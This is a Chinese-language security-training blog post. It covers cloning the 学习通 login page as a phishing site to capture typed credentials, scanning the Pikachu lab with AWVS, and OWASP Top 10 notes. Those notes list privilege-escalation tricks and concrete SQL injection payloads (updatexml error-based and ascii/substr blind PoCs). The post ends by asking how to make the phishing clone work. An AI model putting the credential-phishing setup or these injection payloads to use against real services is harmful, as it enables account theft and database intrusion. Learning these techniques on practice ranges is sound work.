一、学习通钓鱼网站实操
原版登录界面如下
这是克隆后的钓鱼网站,并在其中输入用户名和密码,在后台开启监听
问题:发现用克隆网站登录不了,使用下面这个网页也是登录不了,用原始网页就可以登录,怀疑是网站做了钓鱼网站屏蔽
二、AWS安装
三、使用pikachu做靶场测试AWS
检测报告
四、关于OWASP TOP10的感想
通过2017和2021的排行变化可以看出敏感数据的泄露似乎越来越严重了,也许真的是因为现在社会数字化越来越深入了,然而也正是因为这样,伴随出现了人为疏忽导致的密码泄露,不安全的支付逻辑设计,引用了有漏洞的组件,由于不严谨的条件判断导致的sql注入,也许单纯的技术点都没有问题,也许真的没有绝对安全的系统,因为一旦被人为干预参与进来则真的会漏洞百出,而这正是我们努力的出发点
初步看了前面三个章节的案例,由于里面很多操作不熟悉,所以只能先熟悉一下大概的手法,记录下几个疑问
1、越权提升
通过修改session id实现越权提升
通过构造恶意请求越权提升
通过bp爆破修改cookie userid越权提升
通过遍历修改链接id越权提升
抓包遍历修改支付id垂直越权提升
通过修改抓包关键参数id或链接id越权提升
通过burp爆破遍历修改id越权提升
疑问?案例里那些涉及支付的漏洞怎么做的,需要真实交易,还是说有交易但是不付款通过修改表单状态或id使用确权吗?
2、加密失败
使用弱口令可以登录
忘记密码使用admin泄露信息
输入特殊id工号泄露信息
3、SQL注入
链接id使用以下情况注入admin’,admin’‘,admin’ and 1=‘1(轮子),admin’ and 1 like’ 1,(like可以换成=,!=,<,>,<>,regexp,rlike),admin’ and 1 in’ 1,admin’ and %0 a1 in’ 1,admin’ and %0 a1 in’ 2等等看回显结果
通过修改burp字典爆破,如用户名admin’ or ‘=’,有提示时再用admin’,admin’‘,admin’'‘依次尝试看回显,可能会有盲注,使用报错函数admin’ and updatexml(1,(user()),1)='1确定轮子是否可用,可用的话再用poc.
案例里提到的几个poc:
1’and updatexml(1,concat(0x7e,(user()),0x7e),1)=‘1
url编码poc:1’and updatexml(1,concat(0x7e’,(user())),1))=‘1
库名poc:1’and updatexml(1,concat(0x7e’,(databse())),1))='1
判断用户名长度poc: 6/(15-length(user()))
截取函数poc:6/(1-(if(substr(1,1,1)=1,1,0)))
四则运算Poc:6/(1-(if(0-substr(1,1,1),1,0)))
截取用户名第一位poc:6/(1-(if(ascii(substr(user(),1,1))like(97),1,0)))
得到首位后注出用户名poc:6/(1-(if(98-ascii(substr(user(),1,1)),1,0)))
5、安全配置不当
xxe漏洞利用看的不是很明白
6、易受攻击和过时的组件
struts2、*fastjson反序列化(get变post)、*Apache Shiro(重点,burp抓包历史里可以看到是否存在shiro框架)、weblogic
7、识别和认证失败
主要是用了诸如admin/123456和设备默认密码之类的弱口令
8、软件和数据完整性失败
PHP反序列化和魔术方法看的不是很明白
9、安全日志和监控失败
日志记录应保存最近6个月时间的记录
五、问题
疑问?案例里那些涉及支付的漏洞怎么做的,需要真实交易,还是说有交易但是不付款通过修改表单状态或id使用确权吗?
疑问?判断是否存在注入的方法是什么呢?怎么判断是否存在盲注?是通过不同拼接输入观察回显信息吗?
疑问?为何案例里的sql注入都只获取到用户名第一位就不往下走了,完整的用户名呢?
疑问?注入案例里很多地方涉及到怎么造轮子poc,这块有什么技巧和规则吗?
疑问?学习通克隆网站只能监测键盘输入,但是登录不了,这个有解决办法吗
二、
扫一扫
1119
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
